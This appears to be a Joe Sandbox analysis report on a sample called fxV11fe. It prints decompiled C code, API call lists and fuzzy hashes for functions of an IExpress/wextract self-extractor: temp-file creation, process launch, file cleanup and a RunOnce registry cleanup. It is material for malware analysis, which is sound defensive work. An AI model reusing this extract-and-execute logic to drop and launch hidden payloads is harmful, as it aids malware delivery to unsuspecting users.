                                                                                                                                                                                                                                            0x00a06be6
                                                                                                                                                                                                                                            0x00a06be9
                                                                                                                                                                                                                                            0x00a06bea
                                                                                                                                                                                                                                            0x00a06bea
                                                                                                                                                                                                                                            0x00a06b74
                                                                                                                                                                                                                                            0x00a06c39
                                                                                                                                                                                                                                            0x00a06c3e
                                                                                                                                                                                                                                            0x00a06c3e
                                                                                                                                                                                                                                            0x00a06abe
                                                                                                                                                                                                                                            0x00a06abe
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A07155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A07182
                                                                                                                                                                                                                                              • Part of subcall function 00A07155: GetCurrentProcessId.KERNEL32 ref: 00A07191
                                                                                                                                                                                                                                              • Part of subcall function 00A07155: GetCurrentThreadId.KERNEL32 ref: 00A0719A
                                                                                                                                                                                                                                              • Part of subcall function 00A07155: GetTickCount.KERNEL32 ref: 00A071A3
                                                                                                                                                                                                                                              • Part of subcall function 00A07155: QueryPerformanceCounter.KERNEL32(?), ref: 00A071B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,00A072B8,00000058), ref: 00A06A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00A06AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00A06AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 00A06B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00A06B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 00A06BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 00A06BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: 23d98a1d4cf343940bd64f2c43842d78b2561493175b7aea91e071429eba7ecd
                                                                                                                                                                                                                                            • Instruction ID: 78dd99f8836d5ff1f1b13f4629af221e2c259549e5305cffabcb37cd18e03f14
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23d98a1d4cf343940bd64f2c43842d78b2561493175b7aea91e071429eba7ecd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7141F67098472D9FEB21EFA4F9047AA77F0BB49768F14412AE881E32D1CB7448538B94
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 631 a058c8-a058d5 632 a058d8-a058dd 631->632 632->632 633 a058df-a058f1 LocalAlloc 632->633 634 a058f3-a05901 call a044b9 633->634 635 a05919-a05959 call a01680 call a0658a CreateFileA LocalFree 633->635 638 a05906-a05910 call a06285 634->638 635->638 644 a0595b-a0596c CloseHandle GetFileAttributesA 635->644 645 a05912-a05918 638->645 644->638 646 a0596e-a05970 644->646 646->638 647 a05972-a0597b 646->647 647->645
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A058C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t23 = __ecx + 1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E00A01680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E00A0658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa09124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A05534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A058E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A05534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00A05534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00A05534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A0595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A05534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-3033780695
                                                                                                                                                                                                                                            • Opcode ID: f5481873921c4a6dcbcee830fedfe606553fffa4a42716144c6f794c776e9624
                                                                                                                                                                                                                                            • Instruction ID: f97bcd9ace9d219eb2c2aaa907abda2e741ba1998c9a08e56c08ee3081b155df
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5481873921c4a6dcbcee830fedfe606553fffa4a42716144c6f794c776e9624
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0711E271B0021CABC7249FB9BC4DA9B7E9DEF4A3A0F104615B60AD31D1CA7098178AA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 675 a03fef-a04010 676 a04016-a0403b CreateProcessA 675->676 677 a0410a-a0411a call a06ce0 675->677 678 a04041-a0406e WaitForSingleObject GetExitCodeProcess 676->678 679 a040c4-a04101 call a06285 GetLastError FormatMessageA call a044b9 676->679 682 a04070-a04077 678->682 683 a04091 call a0411b 678->683 691 a04106 679->691 682->683 686 a04079-a0407b 682->686 690 a04096-a040b8 CloseHandle * 2 683->690 686->683 689 a0407d-a04089 686->689 689->683 692 a0408b 689->692 693 a04108 690->693 694 a040ba-a040c0 690->694 691->693 692->683 693->677 694->693 695 a040c2 694->695 695->691
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E00A03FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E00A06CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0xa08a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0xa09a2c; // 0x0
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0xa09a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A0411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0xa09a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE ref: 00A04033
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A04049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 00A0405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A0409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A040A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A040DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00A040E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: d18436ec462799c232066516eb6d29365c5e77ce096284dba0e8cab27f28288e
                                                                                                                                                                                                                                            • Instruction ID: 01161ecb692b6bde997b92d8d7ce9483eb8de8de28e049ad8ec9b05e4a14f65e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d18436ec462799c232066516eb6d29365c5e77ce096284dba0e8cab27f28288e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C431A27164031CABEB20DFA5EC49FAB777CEB98710F1042A9F645E21A1C6744D87CB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A051E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E00A0468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E00A0468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E00A044B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0xa09124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0xa09124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
                                                                                                                                                                                                                                            					 *0xa09124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A02F4D,?,00000002,00000000), ref: 00A05201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A05250
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                              • Part of subcall function 00A06285: GetLastError.KERNEL32(00A05BBC), ref: 00A06285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: cd691d894a29ff3a01fb0b2c8dc3ab19155ca951d9fdccefaec1b7b91c034d44
                                                                                                                                                                                                                                            • Instruction ID: 755de98917e52746b5729ef090ba46088e78ed286e8f94ab179cfbc1019f21f5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd691d894a29ff3a01fb0b2c8dc3ab19155ca951d9fdccefaec1b7b91c034d44
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF11E2F1B0060DABE364ABB17D89BBB61ADEF9C380F104429B702D61D0DAB98C034525
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E00A052B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0xa091e0; // 0x34e8ed0
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0xa08a24 == 0 &&  *0xa09a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0xa08a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0xa08a24 == 0 &&  *0xa09a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E00A01781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            					if(( *0xa09a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E00A065E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E00A02390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0xa08a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0xa09a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E00A01FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0xa08a20 =  *0xa08a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E00A06CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(034E8ED0,00000080,?,00000000), ref: 00A052F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(034E8ED0), ref: 00A052FA
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(034E8ED0,?,00000000), ref: 00A05305
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(034E8ED0), ref: 00A0530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00A011FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A05363
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A05334
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 2833751637-3647970563
                                                                                                                                                                                                                                            • Opcode ID: 9f129546ea0d565a6968989f87f16673c8945f1e168a70226203f63b8218f50b
                                                                                                                                                                                                                                            • Instruction ID: 5db2a3160891560da90f52bfdaf0ccd2d1e4ac922a68fa522131573a4a1adfdd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f129546ea0d565a6968989f87f16673c8945f1e168a70226203f63b8218f50b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF21CF31A0060CDBDB34DFA4FD29B6A37A4BB14380F040119E4825A5E1CBB45C87CF86
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A01FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0xa08530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
